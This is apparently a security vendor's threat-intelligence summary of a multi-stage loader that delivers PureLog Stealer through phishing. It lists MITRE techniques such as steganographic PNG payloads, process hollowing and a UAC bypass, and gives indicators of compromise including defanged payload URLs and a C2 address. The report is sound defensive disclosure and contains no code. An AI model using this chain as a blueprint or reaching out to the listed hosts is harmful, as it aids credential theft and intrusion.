Stealth in Layers: Unmasking the Loader used in Targeted Email Campaigns

CRIL identified a commodity loader used by multiple threat actors in targeted email campaigns that primarily impacted Manufacturing and Government organizations in Italy, Finland, and Saudi Arabia. The multi-stage, fileless infection chain uses weaponized Office documents (CVE-2017-11882), steganographic PNGs hosted on Archive.org, trojanized TaskScheduler assemblies, reflective loading and process hollowing to deliver payloads such as PureLog Stealer to a C2 at 38.49.210[.]241. #PureLogStealer #TaskScheduler

Keypoints

CRIL tracked a commodity loader shared across multiple high-capability threat actors delivering RATs and infostealers to targeted sectors, especially Manufacturing and Government in Europe and the Middle East.
Initial infections used targeted phishing with RAR/ZIP attachments and weaponized Office documents exploiting CVE-2017-11882, as well as malicious SVG and LNK-based archives.
A unified four-stage, largely fileless execution chain includes obfuscated JavaScript, hidden PowerShell retrieval, steganographic PNG extraction, reflective .NET loading, trojanized TaskScheduler assembly, and process hollowing into RegAsm/AddInProcess32.
Steganography and trojanization of open-source libraries were used to evade detection: payloads were embedded in PNGs hosted on legitimate services (Archive.org, Pixeldrain) and malicious functions appended to trusted .NET libraries.
The final payload observed in analyzed samples was PureLog Stealer, which exfiltrates browser credentials, crypto wallet data, email and VPN credentials, and system telemetry to C2 38.49.210[.]241.
A novel UAC bypass was noted where the malware monitors process creation and opportunistically triggers UAC prompts to obtain elevated PowerShell execution through user approval.

MITRE Techniques

[T1566.001 ] Phishing: Spearphishing Attachment – Targeted phishing emails with malicious attachments masquerading as Purchase Orders (‘masquerading as legitimate Purchase Order communications from business partners’).
[T1190 ] Exploit Public-Facing Application – Use of an exploit for CVE-2017-11882 in Microsoft Equation Editor to weaponize Office documents (‘exploiting CVE-2017-11882’).
[T1204.002 ] User Execution: Malicious File – Victims open JavaScript, VBScript, or LNK files delivered in archives (‘Extraction of the RAR archive reveals a first-stage malicious JavaScript payload, PO No 602450.js’).
[T1059.007 ] Command and Scripting Interpreter: JavaScript – Heavily obfuscated JavaScript reconstructs strings and spawns PowerShell to retrieve second-stage payloads (‘The de-obfuscated JavaScript creates a hidden PowerShell process’).
[T1059.001 ] Command and Scripting Interpreter: PowerShell – Hidden PowerShell instance retrieves steganographic payloads and decodes assemblies for reflective loading (‘The decoded PowerShell script functions as a second-stage loader, retrieving a malicious PNG file’).
[T1047 ] Windows Management Instrumentation – WMI objects used to spawn hidden PowerShell processes (‘creates a hidden PowerShell process using WMI objects (winmgmts:rootcimv2)’).
[T1027 ] Obfuscated Files or Information – Multi-layer obfuscation including base64 and string manipulation used throughout the chain (‘Multi-layer obfuscation using base64 encoding and string manipulation’).
[T1027.003 ] Steganography – Payloads steganographically embedded in PNG images hosted on Archive.org and other services (‘malicious payload hidden within PNG image files’).
[T1620 ] Reflective Code Loading – .NET assembly loaded reflectively in memory to avoid disk writes (‘reflected in memory via Reflection.Assembly::Load’).
[T1055.012 ] Process Injection: Process Hollowing – Loader creates a suspended RegAsm.exe and injects the decoded payload into its memory (‘creates a new suspended RegAsm.exe process and injects the decoded payload into its memory space’).
[T1036.005 ] Masquerading: Match Legitimate Name or Location – Execution through legitimate Windows utilities and trojanized libraries to blend with normal activity (‘weaponizing the legitimate open-source TaskScheduler library’ and use of RegAsm/AddInProcess32).
[T1548.002 ] Abuse Elevation Control Mechanism: Bypass User Account Control – UAC bypass that monitors process creation and triggers prompts to gain elevated PowerShell execution (‘monitors process creation events and opportunistically triggered UAC prompts’).
[T1497.003 ] Virtualization/Sandbox Evasion: Time-Based Evasion – Use of a 5-second sleep delay to evade automated sandbox analysis (‘with a 5-second sleep delay’).
[T1552.001 ] Unsecured Credentials: Credentials In Files – Extraction of credentials from stored files and browser databases (‘Extraction of credentials from browser databases and configuration files’).
[T1555.003 ] Credentials from Password Stores: Credentials from Web Browsers – Harvesting saved passwords, cookies, and tokens from multiple browser types (‘Data harvested from a wide range of Chromium-based browsers… Firefox-based browsers’).
[T1555 ] Credentials from Password Stores – Extraction from password manager applications and browser-based password stores (‘Extraction of credentials from password manager applications’).
[T1082 ] System Information Discovery – Collection of hardware, OS, and network information for fingerprinting (‘Collection of hardware, OS, and network information’).
[T1518.001 ] Security Software Discovery – Enumeration of installed antivirus and security products (‘Enumeration of installed antivirus products’).
[T1005 ] Data from Local System – Collection of cryptocurrency wallets, VPN configs, and email data (‘Collection of cryptocurrency wallets, VPN configs, and email data’).
[T1114 ] Email Collection – Harvesting email credentials and configurations from desktop email clients (‘Harvesting email credentials and configurations from email clients’).
[T1102 ] Web Service – Abuse of Archive.org and other web services to host steganographic payloads (‘retrieving a malicious PNG file from Archive.org’).
[T1041 ] Exfiltration Over C2 Channel – Exfiltration of stolen data to C2 infrastructure at 38.49.210[.]241 (‘Data exfiltration to C2 server at 38.49.210.241’).

Indicators of Compromise

[SHA-256 ] Sample and payload hashes – c1322b21eb3f300a7ab0f435d6bcf6941fd0fbd58b02f7af797af464c920040a, 5c0e3209559f83788275b73ac3bcc61867ece6922afabe3ac672240c1c46b1d3, and 4 more hashes.
[URLs ] Malicious hosting and payload retrieval – hxxp://192[.]3.101[.]161/zeus/ConvertedFile[.]txt, hxxps://pixeldrain[.]com/api/file/7B3Gowyz, and 2 more Archive.org PNG URLs.
[IP Address ] Command-and-control server – 38.49.210[.]241 (PureLog Stealer C2).
[File names ] Malicious attachments and loader artifacts – PO No 602450.rar, PO No 602450.js, and Microsoft.Win32.TaskScheduler.dll (trojanized library).
[Binary/process names ] Living-off-the-land binaries abused for execution – RegAsm.exe, AddInProcess32 (used for process hollowing and payload execution).
[File types ] Steganographic payload carriers – PNG files hosted on Archive.org (e.g., MSI_PRO_with_b64[.]png) used to hide base64-encoded .NET assemblies.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print